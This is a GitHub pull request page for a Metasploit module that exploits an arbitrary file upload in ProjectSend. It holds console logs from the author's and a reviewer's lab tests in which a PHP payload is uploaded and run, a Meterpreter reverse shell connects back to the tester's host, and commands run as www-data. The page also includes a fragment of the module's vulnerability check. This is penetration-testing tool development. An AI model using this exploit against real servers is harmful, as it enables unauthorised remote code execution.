Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ProjectSend Arbitrary File Upload module #4459

Merged
merged 1 commit into from Dec 26, 2014

Conversation

@bcoles
Copy link
Contributor

bcoles commented Dec 23, 2014

Add ProjectSend Arbitrary File Upload module

Check

msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.

Run

msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
elsif res.code.to_i == 200 && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Dec 23, 2014

Contributor

Is this supposed to be /sys\.config\.php/ or actually /sys.config.php/ ?

This comment has been minimized.

Copy link
@bcoles

bcoles Dec 23, 2014

Author Contributor

The former; /sys\.config\.php/

@wchen-r7 wchen-r7 added the module label Dec 24, 2014
@jvazquez-r7 jvazquez-r7 self-assigned this Dec 26, 2014
@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Dec 26, 2014

testing...

@jvazquez-r7 jvazquez-r7 merged commit 5c82b8a into rapid7:master Dec 26, 2014
1 check passed
1 check passed
continuous-integration/travis-ci The Travis CI build passed
Details
jvazquez-r7 added a commit that referenced this pull request Dec 26, 2014
@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Dec 26, 2014

Did minor cleanup here: b5b0be9

Test:

msf exploit(projectsend_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module
[*] 172.16.158.137:80 - Uploading file 'xozXXw1.php' (1794 bytes)
[+] 172.16.158.137:80 - Payload uploaded successfully (xozXXw1.php)
[*] 172.16.158.137:80 - Executing upload/files/xozXXw1.php...
[*] Sending stage (40499 bytes) to 172.16.158.137
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.137:38949) at 2014-12-26 11:23:44 -0600
[+] Deleted xozXXw1.php
[*] 172.16.158.137:80 - Request timed out while executing

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

thanks @bcoles ! landed

@bcoles bcoles deleted the bcoles:projectsend_upload_exec branch May 5, 2015
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.